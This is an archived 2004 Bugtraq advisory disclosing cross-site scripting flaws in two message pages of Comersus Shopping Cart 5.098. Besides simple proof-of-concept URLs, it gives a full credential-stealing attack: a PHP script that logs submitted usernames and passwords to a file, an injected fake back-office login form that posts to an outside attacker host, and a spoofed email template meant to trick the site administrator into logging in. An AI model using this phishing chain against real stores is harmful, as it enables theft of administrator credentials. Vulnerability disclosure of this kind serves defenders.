| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040802114840.16319.qmail@www.securityfocus.com>
Date: 2 Aug 2004 11:48:40 -0000
From: Abdul Azis <az001@...sa.com>
To: bugtraq@...urityfocus.com
Subject: Comersus 5.098 XSS Vulnerable
Comersus Shopping Cart 5.098 XSS Vulnerability
=======================================================
Vulnerable Systems:
* Comersus Cart Version 5.098
Comersus is an open source shopping cart.I found a few XSS Vulnerabilty :
Pages Affected:
/comersus/store/comersus_message.asp
/comersus/backofficeLite/comersus_backoffice_message.asp
Examples:
http://www.target.net/comersus/store/comersus_message.asp?message=<h4>VULNERABLE</h4>
http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<h4>VULNERABLE</h4>
Try this :
1 Step :
Create a file called comersus.php
<?
$buka = fopen("comersus.txt","a+");
fwrite($buka,"User:".$uid."|"."Password:".$passwd."|");
fclose($buka);
header("Location:http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=Your+authentication+data+is+incorrect...");
exit();
?>
Next Step :
Open url :
http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<form%20action=http://mysite.org/comersus.php%20method=post><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=uid><br>Password<br><input%20type=password%20name=passwd><p><input%20type=submit%20value=%20Login%20></form>
Enter user and password,then Submit
After that, enter this url:
http://mysite.org/comersus.txt
This is a result(comersus.txt) :
User:az001|Password:passwordnya|
Sent a fake email from Comersus Site(support@...ersus.com) to www.target.net admin (ex. admin@...get.net):
Hello admin@...get.net blablablablabla ...............................................
................................................................
Please Login with username and password <a href="http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<form%20action=http://mysite.org/comersus.php%20method=post><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=uid><br>Password<br><input%20type=password%20name=passwd><p><input%20type=submit%20value=%20Login%20></form>">here</a>
and Wait until admin execute url
Powered by blists - more mailing lists